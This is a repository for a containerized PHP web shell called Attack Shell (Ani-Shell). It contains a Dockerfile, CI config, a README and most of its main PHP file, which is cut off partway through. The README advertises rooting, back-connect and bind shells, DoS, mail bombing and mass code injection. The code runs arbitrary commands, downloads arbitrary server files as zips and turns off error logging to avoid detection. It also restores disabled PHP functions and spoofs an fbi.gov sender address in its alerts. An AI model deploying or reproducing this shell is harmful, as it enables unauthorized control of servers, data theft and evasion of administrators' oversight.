├── .dockerignore
├── Dockerfile
├── LICENSE
├── README.md
├── circle.yml
├── index.php
└── license.php


/.dockerignore:
--------------------------------------------------------------------------------
1 | .git
2 | .dockerignore
3 | circle.yml
4 | Dockerfile
5 | LICENSE
6 | README.md
7 | 


--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM k0st/alpine-apache-php
 2 | 
 3 | LABEL maintainer "franzwagner.str@gmail.com"
 4 | 
 5 | # Change the TZ according to your region
 6 | ENV TZ=America/Sao_Paulo
 7 | 
 8 | RUN apk add --update --virtual .build-deps tzdata && \
 9 |   ln -snf /usr/share/zoneinfo/${TZ} /etc/localtime && \
10 |   echo "${TZ}" > /etc/timezone && \
11 |   apk del .build-deps
12 | 
13 | COPY . /app
14 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2016, 2017 Franzwagner Ternus
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | [//]: # (Badges)
  2 | [![CircleCI](https://circleci.com/gh/strund3r/Attack-Shell.svg?style=shield&circle-token=1d6716ce0fb3e522e9d1b56accd7a3c4c9090700)](https://circleci.com/gh/strund3r/Attack-Shell)
  3 | [![Image Layers](https://images.microbadger.com/badges/image/strund3r/attack-shell.svg)](https://microbadger.com/images/strund3r/attack-shell "Get your own image badge on microbadger.com")
  4 | [![Docker Pulls](https://img.shields.io/docker/pulls/strund3r/attack-shell.svg)](https://hub.docker.com/r/strund3r/attack-shell/) [![Version](https://images.microbadger.com/badges/version/strund3r/attack-shell.svg)](https://microbadger.com/images/strund3r/attack-shell "Get your own version badge on microbadger.com") [![Docker Automated buil](https://img.shields.io/docker/automated/strund3r/attack-shell.svg)](https://hub.docker.com/r/strund3r/attack-shell/)
  5 | 
  6 | # **(Containerized) Attack Shell**
  7 | ##### 	*by Strund3r*
  8 | 
  9 | # **Ani Shell**
 10 | ##### 	*by lionaneesh*
 11 | 
 12 | ###### *Note: This software was intended to be used for Demonstration and Learning Purposes only. The author is not responsible for any damage it may cause and user holds full responsibility of his/her actions. ALL CREDIT GOES TO @lionaneesh*
 13 | 
 14 | ### **Introduction**
 15 | 
 16 | Attack Shell a.k.a. Ani-Shell is a simple PHP shell with some unique features like Mass Mailer, a simple Web-Server Fuzzer, Dosser, Back Connect, Bind Shell, Back Connect, Auto Rooter etc.
 17 | This shell has immense capabilities and have been written with some coding standards in mind for better editing and customization.
 18 | 
 19 | ### **Run on a local Docker Container**
 20 | 
 21 | Run on `terminal`:
 22 | ```sh
 23 | $ docker run -d -p 80:80 --name attack-shell strund3r/attack-shell
 24 | ```
 25 | 
 26 | To find the container's IP address, run the following command:
 27 | ```sh
 28 | $ docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' attack-shell
 29 | ```
 30 | 
 31 | If you want to use a `php.ini`, change the `Dockerfile` to:
 32 | ```
 33 | FROM k0st/alpine-apache-php
 34 | 
 35 | LABEL maintainer "franzwagner.str@gmail.com"
 36 | 
 37 | # Change the TZ according to your region
 38 | ENV TZ=America/Sao_Paulo
 39 | 
 40 | RUN apk add --update --virtual .build-deps tzdata && \
 41 |   ln -snf /usr/share/zoneinfo/${TZ} /etc/localtime && \
 42 |   echo "${TZ}" > /etc/timezone && \
 43 |   apk del .build-deps
 44 | 
 45 | COPY config/php.ini /usr/local/etc/php/
 46 | COPY . /var/www/html
 47 | ```
 48 | Where `config/` is the directory containing your `php.ini` file.
 49 | 
 50 | ### **Customization**
 51 | 
 52 | 1. Email Traceback is set to **_off_** as default and emails will not be sent. If you are setting this feature **_on_**, make sure you change the default email address (franzwagner.str@gmail.com) to your email address.
 53 | **Please change it before using!**
 54 | 
 55 | 2. Username and Password are set to **_admin_** and **_12345678_** respectively, please change them for better security.
 56 | 
 57 | 3. The Lock Mode feature is set to **_on_** ! This should not be change unless you want your shell exposed.
 58 | 
 59 | 4. The Anti-Crawler feature is set to **_off_** ! Change it to **_on_** for anti-crawler support.
 60 | 
 61 | 5. A variable named greetings can be changed to change the Shell's greeting message.
 62 | 
 63 | ### **Default Login**
 64 | 
 65 | - Username: *admin*
 66 | - Password: *12345678*
 67 | 
 68 | ### **Features**
 69 | 
 70 | - [x] Shell
 71 | - [x] Intelligent File Manager
 72 | - [x] Auto Rooter
 73 | - [x] PHP Obfuscate
 74 | - [x] Platform Independent
 75 | - [x] Mass - Mailer
 76 | - [x] Small Web-Server Fuzzer
 77 | - [x] Dosser
 78 | - [x] Design
 79 | - [x] Secure Login
 80 | - [x] Deletion of Files
 81 | - [x] Bind Shell
 82 | - [x] Back Connect
 83 | - [x] Fixed Some Coding errors!
 84 | - [x] Rename Files
 85 | - [x] Encoded Title
 86 | - [x] Traceback (Email Alerts)
 87 | - [x] PHP Evaluate
 88 | - [x] Better Command Execution (supports older version of PHP)
 89 | - [x] Mass Code Injector (Appender and Overwinter)
 90 | - [x] Lock Mode Customization
 91 | - [x] Mail Bomber (With Less Spam detection feature)
 92 | - [x] PHP Decoder
 93 | - [x] Anti-Crawler Feature
 94 | - [x] MD5 Hash Cracker
 95 | - [x] Python Bind-Shell
 96 | 
 97 | # License
 98 | ### MIT License
 99 | 
100 | ##### *Copyright (c) 2016, 2017 Franzwagner Ternus*
101 | 
102 | Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
103 | 
104 | The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
105 | 
106 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
107 | 


--------------------------------------------------------------------------------
/circle.yml:
--------------------------------------------------------------------------------
 1 | machine:
 2 |   services:
 3 |     - docker
 4 |   timezone:
 5 |     America/Sao_Paulo
 6 | 
 7 | dependencies:
 8 |   override:
 9 |     - docker build --rm=false -t strund3r/attack-shell .
10 | 
11 | test:
12 |   override:
13 |     - docker run -d --name attack strund3r/attack-shell; sleep 10
14 |     - curl --retry 10 --retry-delay 5 -v http://172.18.0.2/index.php
15 | 
16 | deployment:
17 |   hub:
18 |     branch: master
19 |     commands:
20 |       - docker login -e $DOCKER_EMAIL -u $DOCKER_USER -p $DOCKER_PASS
21 |       - docker push strund3r/attack-shell
22 | 


--------------------------------------------------------------------------------
/index.php:
--------------------------------------------------------------------------------
   1 | <?php
   2 | /*
   3 | []====================================================
   4 | []--------------------Attack Shell--------------------
   5 | []                       a.k.a.
   6 | []---------------------Ani Shell----------------------
   7 | []====================================================
   8 | []>>>>>>>>>>>>>>> c0d3d by lionaneesh <<<<<<<<<<<<<<<<
   9 | []====================================================
  10 | []      +  Email: lionaneesh@gmail.com         +
  11 | []      +  Twitter: twitter.com/lionaneesh     +
  12 | []====================================================
  13 | []>>>>>>>>>>>> containerized by Strund3r <<<<<<<<<<<<<
  14 | []====================================================
  15 | []      +  Email: franzwagner.str@gmail.com    +
  16 | []      +  Twitter: twitter.com/strund3r       +
  17 | []====================================================
  18 | */
  19 | 
  20 | ini_set('max_execution_time',0);
  21 | ini_set('memory_limit','999999999M');
  22 | 
  23 | 
  24 | function Zip($source, $destination) // Thanks to Alix Axel
  25 | {
  26 |     if (!extension_loaded('zip') || !file_exists($source)) {
  27 |         return false;
  28 |     }
  29 | 
  30 |     $zip = new ZipArchive();
  31 |     if (!$zip->open($destination, ZIPARCHIVE::CREATE)) {
  32 |         return false;
  33 |     }
  34 | 
  35 |     $source = str_replace('\\', '/', realpath($source));
  36 | 
  37 |     if (is_dir($source) === true)
  38 |     {
  39 |         $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  40 | 
  41 |         foreach ($files as $file)
  42 |         {
  43 |             $file = str_replace('\\', '/', realpath($file));
  44 | 
  45 |             if (is_dir($file) === true)
  46 |             {
  47 |                 $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  48 |             }
  49 |             else if (is_file($file) === true)
  50 |             {
  51 |                 $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  52 |             }
  53 |         }
  54 |     }
  55 |     else if (is_file($source) === true)
  56 |     {
  57 |         $zip->addFromString(basename($source), file_get_contents($source));
  58 |     }
  59 | 
  60 |     return $zip->close();
  61 | }
  62 | 
  63 | if(isset($_GET['zip'])) {
  64 | 	$src = $_GET['zip'];
  65 | 	$dst = getcwd()."/".basename($_GET['zip']).".zip";
  66 | 	if (Zip($src, $dst) != false) {
  67 | 		$filez = file_get_contents($dst);
  68 | 		header("Content-type: application/octet-stream");
  69 | 		header("Content-length: ".strlen($filez));
  70 | 		header("Content-disposition: attachment; filename=\"".basename($dst)."\";");
  71 | 		echo $filez;
  72 | 	}
  73 | 	exit;
  74 | }
  75 | 
  76 | // ------------------------------------- Some header Functions (Need to be on top) ---------------------------------\
  77 | 
  78 | /**************** Defines *********************************/
  79 | 
  80 | $greeting 		= "0x xx Welcome Young Warrior xx x0";
  81 | $user 			= "admin";
  82 | $pass 			= "12345678";
  83 | $lock 			= "on"; // set this to off if you dont need the login page
  84 | $antiCrawler 		= "off"; // set this to on if u dont want your shell to be publicised in Search Engines ! (It increases the shell's Life')
  85 | $tracebackFeature 	= "on"; // set this feature to on to enable email alerts
  86 | $ownerEmail 		= "franzwagner.str@gmail.com"; // Change this to your email , This email is used to deliver tracebacks about your shell
  87 | $url 			= (!empty($_SERVER['HTTPS'])) ? "https://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'] : "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  88 | $phpVersion		= phpversion();
  89 | $self			= $_SERVER["PHP_SELF"]; // Where am i
  90 | $sm 			= @ini_get('safe_mode');
  91 | $SEPARATOR 		= '/'; // Default Directory separator
  92 | $os 			= "N/D";
  93 | 
  94 | if(stristr(php_uname(),"Windows"))
  95 | {
  96 |         $SEPARATOR = '\\';
  97 |         $os = "Windows";
  98 | }
  99 | 
 100 | else if(stristr(php_uname(),"Linux"))
 101 | {
 102 |         $os = "Linux";
 103 | }
 104 | 
 105 | //*************************************************************/
 106 | 
 107 | // -------------- Traceback Functions
 108 | 
 109 | function sendLoginAlert()
 110 | {
 111 |     global $ownerEmail;
 112 |     global $url;
 113 |     $accesedIp = $_SERVER['REMOTE_ADDR'];
 114 |     $randomInt = rand(0,1000000);           # to avoid id blocking
 115 |     $from = "attack-shell$randomInt@fbi.gov";
 116 | 
 117 |     //echo $from;
 118 | 
 119 |     if(function_exists('mail'))
 120 |     {
 121 |         $subject = "Shell Accessed -- Attack Shell --";
 122 |         $message = "
 123 | Hey Owner ,
 124 | 
 125 |         Your Attack Shell located at $url was accessed by $accesedIp
 126 | 
 127 |         If its not you :-
 128 | 
 129 |         1. Please check if the shell is secured.
 130 |         2. Change your user name and Password.
 131 |         3. Check if lock is 0n!
 132 | 
 133 |         Thanking You
 134 | 
 135 | Yours Faithfully
 136 | attack-Shell
 137 |         ";
 138 |         mail($ownerEmail,$subject,$message,'From:'.$from);
 139 |     }
 140 | }
 141 | 
 142 | //---------------------------------------------------------
 143 | 
 144 | 
 145 | if(function_exists('session_start') && $lock == 'on')
 146 | {
 147 |     session_start();
 148 | }
 149 | else
 150 | {
 151 |     // The lock will be set to 'off' if the session_start fuction is disabled i.e if sessions are not supported
 152 |     $lock = 'off';
 153 | }
 154 | 
 155 | //logout
 156 | 
 157 | if(isset($_GET['logout']) && $lock == 'on')
 158 | {
 159 |     $_SESSION['authenticated'] = 0;
 160 |     session_destroy();
 161 |     header("location: ".$_SERVER['PHP_SELF']);
 162 | }
 163 | 
 164 | ini_set('max_execution_time',0);
 165 | 
 166 | 
 167 | 
 168 | /***************** Restoring *******************************/
 169 | 
 170 | 
 171 | ini_restore("safe_mode_include_dir");
 172 | ini_restore("safe_mode_exec_dir");
 173 | ini_restore("disable_functions");
 174 | ini_restore("allow_url_fopen");
 175 | ini_restore("safe_mode");
 176 | ini_restore("open_basedir");
 177 | 
 178 | if(function_exists('ini_set'))
 179 | {
 180 |     ini_set('error_log',NULL);  // No alarming logs
 181 |     ini_set('log_errors',0);    // No logging of errors
 182 |     ini_set('file_uploads',1);  // Enable file uploads
 183 |     ini_set('allow_url_fopen',1);   // allow url fopen
 184 | }
 185 | 
 186 | else
 187 | {
 188 |     ini_alter('error_log',NULL);
 189 |     ini_alter('log_errors',0);
 190 |     ini_alter('file_uploads',1);
 191 |     ini_alter('allow_url_fopen',1);
 192 | }
 193 | 
 194 | // ----------------------------------------------------------------------------------------------------------------
 195 | 
 196 | 
 197 | ?>
 198 | <html>
 199 | <head>
 200 | <title>Attack Shell</title>
 201 | 
 202 | <?php
 203 | if($antiCrawler != 'off')
 204 | {
 205 |     ?>
 206 |     <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
 207 |     <?php
 208 | }
 209 | ?>
 210 | 
 211 | <style>
 212 | 
 213 | /*
 214 | ==========================
 215 |     CSS Section
 216 | ==========================
 217 | */
 218 | 
 219 | * {
 220 |     padding:0;
 221 |     margin:0;
 222 | }
 223 | 
 224 | html, body {
 225 | 	height: 100%;
 226 | }
 227 | 
 228 | #container {
 229 | min-height: 100%;
 230 | margin-bottom: -330px;
 231 | position: relative;
 232 | }
 233 | 
 234 | #footer {
 235 | height: 330px;
 236 | position: relative;
 237 | }
 238 | 
 239 | .clearfooter {
 240 | height: 330px;
 241 | clear: both;
 242 | }
 243 | 
 244 | .alert
 245 | {
 246 |     background:red;
 247 |     color:white;
 248 |     font-weight:bold;
 249 | }
 250 | td.info
 251 | {
 252 |     width:0px;
 253 | }
 254 | 
 255 | .bind
 256 | {
 257 |     border: 1px solid #333333;
 258 |     margin: 15px auto 0;
 259 |     font-size: small;
 260 | }
 261 | 
 262 | div.end *
 263 | {
 264 |     font-size:small;
 265 | }
 266 | 
 267 | div.end
 268 | {
 269 |     width:100%;
 270 |     background:#222;
 271 | }
 272 | 
 273 | p.blink
 274 | {
 275 |     text-decoration: blink;
 276 | }
 277 | 
 278 | body
 279 | {
 280 |     background-color:black;
 281 |     color:rgb(35,182,39);
 282 |     font-family:Tahoma,Verdana,Arial;
 283 |     font-size: small;
 284 | }
 285 | 
 286 | input.own {
 287 |     background-color: Green;
 288 |     color: white;
 289 |     border : 1px solid #ccc;
 290 | }
 291 | 
 292 | blockquote.small
 293 | {
 294 |     font-size: smaller;
 295 |     color: silver;
 296 |     text-align: center;
 297 | }
 298 | 
 299 | table.files
 300 | {
 301 |     border-spacing: 10px;
 302 |     font-size: small;
 303 | }
 304 | 
 305 | h1 {
 306 |     padding: 4px;
 307 |     padding-bottom: 0px;
 308 |     margin-right : 5px;
 309 | }
 310 | div.logo
 311 | {
 312 |     border-right: 1px aqua solid;
 313 | }
 314 | div.header
 315 | {
 316 |     padding-left: 5px;
 317 |     font-size: small;
 318 |     text-align: left;
 319 | }
 320 | div.nav
 321 | {
 322 |     margin-top:1px;
 323 |     height:60px;
 324 |     background-color: #ccc;
 325 | }
 326 | div.nav ul
 327 | {
 328 |     list-style: none;
 329 |     padding: 4px;
 330 | }
 331 | div.nav li
 332 | {
 333 |     float: left;
 334 |     margin-right: 10px;
 335 |     text-align:center;
 336 | }
 337 | textarea.cmd
 338 | {
 339 |     border : 1px solid #111;
 340 |     background-color : green;
 341 |     font-family: Shell;
 342 |     color : white;
 343 |     margin-top: 30px;
 344 |     font-size:small;
 345 | }
 346 | 
 347 | input.cmd
 348 | {
 349 |     background-color:black;
 350 |     color: white;
 351 |     width: 400px;
 352 |     border : 1px solid #ccc;
 353 | 
 354 | }
 355 | td.maintext
 356 | {
 357 |     font-size: large;
 358 | }
 359 | #margins
 360 | {
 361 |     margin-left: 10px;
 362 |     margin-top: 10px;
 363 |     color:white;
 364 | }
 365 | table.top
 366 | {
 367 |     border-bottom: 1px solid aqua;
 368 |     width: 100%;
 369 | }
 370 | #borders
 371 | {
 372 |     border-top : 1px solid aqua;
 373 |     border-left:1px solid aqua;
 374 |     border-bottom: 1px solid aqua;
 375 |     border-right: 1px solid aqua;
 376 |     margin-bottom:0;
 377 | }
 378 | td.file a , .file a
 379 | {
 380 |     text-decoration:none;
 381 | }
 382 | a:link, a:visited {
 383 |     color: #ff0000;
 384 |     text-decoration: underline;
 385 |     cursor: zoom-in;
 386 | }
 387 | 
 388 | a:link:active, a:visited:active {
 389 |     color: #00ff00;
 390 | }
 391 | a.dir
 392 | {
 393 |     font-weight:bold;
 394 |     text-decoration:none;
 395 | }
 396 | td.dir a
 397 | {
 398 |     text-decoration:none;
 399 | }
 400 | td.download,td.download2
 401 | {
 402 |     color:green;
 403 | }
 404 | #spacing
 405 | {
 406 |     padding:10px;
 407 |     margin-left:200px;
 408 | }
 409 | th.header
 410 | {
 411 |     background: none repeat scroll 0 0 #191919;
 412 |     color: white;
 413 |     border-bottom : 1px solid #333333;
 414 | }
 415 | p.alert_red
 416 | {
 417 |     background : red;
 418 |     color: white;
 419 | }
 420 | 
 421 | p.alert_green
 422 | {
 423 |     background : lightgreen;
 424 |     color: black;
 425 | }
 426 | /*
 427 | 
 428 | --------------------------------CSS END------------------------------------------------------
 429 | 
 430 | */
 431 | </style>
 432 | 
 433 | </head>
 434 | 
 435 | <body text="rgb(39,245,10)" bgcolor="black">
 436 | 
 437 | <div id='container'>
 438 | <?php
 439 | if(isset($_POST['user']) && isset($_POST['pass']) && $lock == 'on')
 440 | {
 441 |     if( $_POST['user'] == $user &&
 442 |          $_POST['pass'] == $pass )
 443 |     {
 444 |             $_SESSION['authenticated'] = 1;
 445 |             // --------------------- Tracebacks --------------------------------
 446 |             if($tracebackFeature == 'On')
 447 |             {
 448 |                 sendLoginAlert();
 449 |             }
 450 |             // ------------------------------------------------------------------
 451 |     }
 452 | }
 453 | 
 454 | if($lock == 'off')
 455 | {?>
 456 |     <p class="alert_red"><b>Lock is Switched Off! , The shell can be accessed by anyone!</b></p>
 457 | <?php
 458 | }
 459 | 
 460 | if($lock == 'on' && (!isset($_SESSION['authenticated']) || $_SESSION['authenticated']!=1) )
 461 | {
 462 | 
 463 | ?>
 464 | <table>
 465 |     <tbody>
 466 |         <tr>
 467 |             <td width="500px">
 468 |         <pre>
 469 | <font color="grey">
 470 | <b>
 471 | []========================================
 472 | []--------------Attack Shell--------------
 473 | []----------------------------------------
 474 | []========================================
 475 | []>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<
 476 | []========================================
 477 | []                                       +
 478 | []   Twitter : twitter.com/strund3r      +
 479 | []                                       +
 480 | []========================================
 481 | []
 482 | []
 483 | []
 484 | []
 485 | []
 486 | []
 487 | []
 488 | []
 489 | []
 490 | []  <font color="rgb(0, 255, 0)">Code</font>
 491 | []      <font color="rgb(0, 255, 0)">Hack</font>
 492 | []          <font color="rgb(0, 255, 0)">Live</font>
 493 | []
 494 | []
 495 | </b>
 496 | </font>
 497 | </pre>
 498 |             </td>
 499 |             <td>
 500 |                 <h1><?php echo $greeting;?></h1><br /><br />
 501 |                 <form method="POST" action="<?php echo $_SERVER['PHP_SELF'];?>">
 502 |                 <input name="user" value="Username" onfocus="if(this.value == 'Username')this.value = '';" onblur="if(this.value=='')this.value='Username';"/> <input name="pass" type="password" value="Password" onfocus="if(this.value == 'Password')this.value = '';" onblur="if(this.value=='')this.value='Password';"/> <input class="own" type="Submit" value="Own This Box!"/> <a href="license.php">See License</a>
 503 |                 </form>
 504 |             </td>
 505 |         </tr>
 506 |     </tbody>
 507 | </table>
 508 | <?php
 509 | }
 510 | //---------------------------------- We are authenticated now-------------------------------------
 511 | //Launch the shell
 512 | else
 513 | {
 514 |     //---------------------------------- Fuctions ---------------------------------------------------
 515 | 
 516 |     function showDrives()
 517 |     {
 518 |         global $self;
 519 |         foreach(range('A','Z') as $drive)
 520 |         {
 521 |             if(is_dir($drive.':\\'))
 522 |             {
 523 |                 ?>
 524 |                 <a class="dir" href='<?php echo $self ?>?dir=<?php echo $drive.":\\"; ?>'>
 525 |                     <?php echo $drive.":\\" ?>
 526 |                 </a>
 527 |                 <?php
 528 |             }
 529 |         }
 530 |     }
 531 | 
 532 |     function HumanReadableFilesize($size)
 533 |     {
 534 | 
 535 |         $mod = 1024;
 536 | 
 537 |         $units = explode(' ','B KB MB GB TB PB');
 538 |         for ($i = 0; $size > $mod; $i++)
 539 |         {
 540 |             $size /= $mod;
 541 |         }
 542 | 
 543 |         return round($size, 2) . ' ' . $units[$i];
 544 |     }
 545 | 
 546 | function getClientIp()
 547 | {
 548 |     echo $_SERVER['REMOTE_ADDR'];
 549 | }
 550 | 
 551 | function getServerIp()
 552 | {
 553 |     echo getenv('SERVER_ADDR');
 554 | }
 555 | function getSoftwareInfo()
 556 | {
 557 |     echo php_uname();
 558 | }
 559 | function diskSpace()
 560 | {
 561 |     echo HumanReadableFilesize(disk_total_space("/"));
 562 | }
 563 | function freeSpace()
 564 | {
 565 |     echo HumanReadableFilesize(disk_free_space("/"));
 566 | }
 567 | function getSafeMode()
 568 | {
 569 |         global $sm;
 570 | 		echo($sm?"ON (Most of the Features will Not Work)":"OFF");
 571 | 
 572 | }
 573 | 
 574 | function getDisabledFunctions()
 575 | {
 576 |     if(!ini_get('disable_functions'))
 577 |     {
 578 | 		echo "None";
 579 |     }
 580 |     else
 581 |     {
 582 | 			echo @ini_get('disable_functions');
 583 |     }
 584 | }
 585 | 
 586 | function getFilePermissions($file)
 587 | {
 588 | 
 589 | $perms = fileperms($file);
 590 | 
 591 | if (($perms & 0xC000) == 0xC000) {
 592 |     // Socket
 593 |     $info = 's';
 594 | } elseif (($perms & 0xA000) == 0xA000) {
 595 |     // Symbolic Link
 596 |     $info = 'l';
 597 | } elseif (($perms & 0x8000) == 0x8000) {
 598 |     // Regular
 599 |     $info = '-';
 600 | } elseif (($perms & 0x6000) == 0x6000) {
 601 |     // Block special
 602 |     $info = 'b';
 603 | } elseif (($perms & 0x4000) == 0x4000) {
 604 |     // Directory
 605 |     $info = 'd';
 606 | } elseif (($perms & 0x2000) == 0x2000) {
 607 |     // Character special
 608 |     $info = 'c';
 609 | } elseif (($perms & 0x1000) == 0x1000) {
 610 |     // FIFO pipe
 611 |     $info = 'p';
 612 | } else {
 613 |     // Unknown
 614 |     $info = 'u';
 615 | }
 616 | 
 617 | // Owner
 618 | $info .= (($perms & 0x0100) ? 'r' : '-');
 619 | $info .= (($perms & 0x0080) ? 'w' : '-');
 620 | $info .= (($perms & 0x0040) ?
 621 |             (($perms & 0x0800) ? 's' : 'x' ) :
 622 |             (($perms & 0x0800) ? 'S' : '-'));
 623 | 
 624 | // Group
 625 | $info .= (($perms & 0x0020) ? 'r' : '-');
 626 | $info .= (($perms & 0x0010) ? 'w' : '-');
 627 | $info .= (($perms & 0x0008) ?
 628 |             (($perms & 0x0400) ? 's' : 'x' ) :
 629 |             (($perms & 0x0400) ? 'S' : '-'));
 630 | 
 631 | // World
 632 | $info .= (($perms & 0x0004) ? 'r' : '-');
 633 | $info .= (($perms & 0x0002) ? 'w' : '-');
 634 | $info .= (($perms & 0x0001) ?
 635 |             (($perms & 0x0200) ? 't' : 'x' ) :
 636 |             (($perms & 0x0200) ? 'T' : '-'));
 637 | 
 638 | return $info;
 639 | 
 640 | }
 641 | 
 642 | // Dir size
 643 | 
 644 | /**
 645 |  * Get the directory size
 646 |  * @param directory $directory
 647 |  * @return integer
 648 |  */
 649 | function dirSize($directory) {
 650 |     $size = 0;
 651 |     foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory)) as $file){
 652 |         try {
 653 |             $size += $file->getSize();
 654 |         }
 655 |         catch (Exception $e){    // Symlinks and other shits
 656 |             $size += 0;
 657 |         }
 658 |     }
 659 |     return $size;
 660 | }
 661 | 
 662 | /***********************************************************/
 663 | // exec_all , A function used to execute commands , This function will only execute if the Safe Mode is
 664 | // Turned OFF!
 665 | /**********************************************************/
 666 | 
 667 | 
 668 | function exec_all($command)
 669 | {
 670 | 
 671 |     $output = '';
 672 |     if(function_exists('exec'))
 673 |     {
 674 |         exec($command,$output);
 675 |         $output = join("\n",$output);
 676 |     }
 677 | 
 678 |     else if(function_exists('shell_exec'))
 679 |     {
 680 |         $output = shell_exec($command);
 681 |     }
 682 | 
 683 |     else if(function_exists('popen'))
 684 |     {
 685 |         $handle = popen($command , "r"); // Open the command pipe for reading
 686 |         if(is_resource($handle))
 687 |         {
 688 |             if(function_exists('fread') && function_exists('feof'))
 689 |             {
 690 |                 while(!feof($handle))
 691 |                 {
 692 |                     $output .= fread($handle, 512);
 693 |                 }
 694 |             }
 695 |             else if(function_exists('fgets') && function_exists('feof'))
 696 |             {
 697 |                 while(!feof($handle))
 698 |                 {
 699 |                     $output .= fgets($handle,512);
 700 |                 }
 701 |             }
 702 |         }
 703 |         pclose($handle);
 704 |     }
 705 | 
 706 | 
 707 |     else if(function_exists('system'))
 708 |     {
 709 |         ob_start(); //start output buffering
 710 |         system($command);
 711 |         $output = ob_get_contents();    // Get the ouput
 712 |         ob_end_clean();                 // Stop output buffering
 713 |     }
 714 | 
 715 |     else if(function_exists('passthru'))
 716 |     {
 717 |         ob_start(); //start output buffering
 718 |         passthru($command);
 719 |         $output = ob_get_contents();    // Get the ouput
 720 |         ob_end_clean();                 // Stop output buffering
 721 |     }
 722 | 
 723 |     else if(function_exists('proc_open'))
 724 |     {
 725 |         $descriptorspec = array(
 726 |                 1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
 727 |                 );
 728 |         $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
 729 |         if(is_resource($handle))
 730 |         {
 731 |             if(function_exists('fread') && function_exists('feof'))
 732 |             {
 733 |                 while(!feof($pipes[1]))
 734 |                 {
 735 |                     $output .= fread($pipes[1], 512);
 736 |                 }
 737 |             }
 738 |             else if(function_exists('fgets') && function_exists('feof'))
 739 |             {
 740 |                 while(!feof($pipes[1]))
 741 |                 {
 742 |                     $output .= fgets($pipes[1],512);
 743 |                 }
 744 |             }
 745 |         }
 746 |         pclose($handle);
 747 |     }
 748 | 
 749 |     return(htmlspecialchars($output));
 750 | 
 751 | }
 752 | 
 753 | function magicQuote($text)
 754 | {
 755 |     if (!get_magic_quotes_gpc())
 756 |     {
 757 |         return $text;
 758 |     }
 759 |     return stripslashes($text);
 760 | }
 761 | 
 762 | function md5Crack($hash , $list)
 763 | {
 764 |     $fd = fopen($list,"r");
 765 |     if( strlen($hash) != 32  || $fd == FALSE)
 766 |     {
 767 |         // echo "$hash , " . strlen($hash) ." , $list , $fd"; // Debugging
 768 |         return "<p class='alert_red'>Hash or List invalid!</p>";
 769 |     }
 770 |     else
 771 |     {
 772 |         while (! feof( $fd ))
 773 |         {
 774 |             if( ($pwdList = fgets( $fd, 1024 )) == FALSE)
 775 |             {
 776 |                 break;
 777 |             }
 778 |             $pwdList = trim($pwdList);
 779 | 
 780 |             if(md5($pwdList) == $hash )
 781 |             {
 782 |                     return "<script>alert('Password Cracked');</script>\n<h2>Hash Cracked</h2><br /><br />\n<p class='alert_green'>Planintext : $pwdList</p>";
 783 |             }
 784 |         }
 785 | 
 786 |     }
 787 | }
 788 | 
 789 | function exec_query_mysql($query,$sql_server,$sql_port,$sql_db,$sql_user,$sql_pass)
 790 | {
 791 |     $link = mysql_connect($sql_server.":".$port,$sql_user,$sql_pass);
 792 |     if(!$link)
 793 |     {
 794 |         return 'Could not connect: ' . mysql_error();
 795 |     }
 796 |     $resource = mysql_query($query);
 797 |     if(!$resource) return(mysql_error());
 798 | }
 799 | 
 800 | //------------------------------------------------------------------------------------------------
 801 | 
 802 | 
 803 | ?>
 804 | 
 805 | <table class="top">
 806 |     <tbody>
 807 |         <tr>
 808 |             <td width="300px;">
 809 |             <div class="logo">
 810 |                 <img src="http://ani-shell.sourceforge.net/banner.jpg" />
 811 |             </div>
 812 |             </td>
 813 |             <td>
 814 |             <div class="header">
 815 |             <?php getSoftwareInfo(); ?><br />
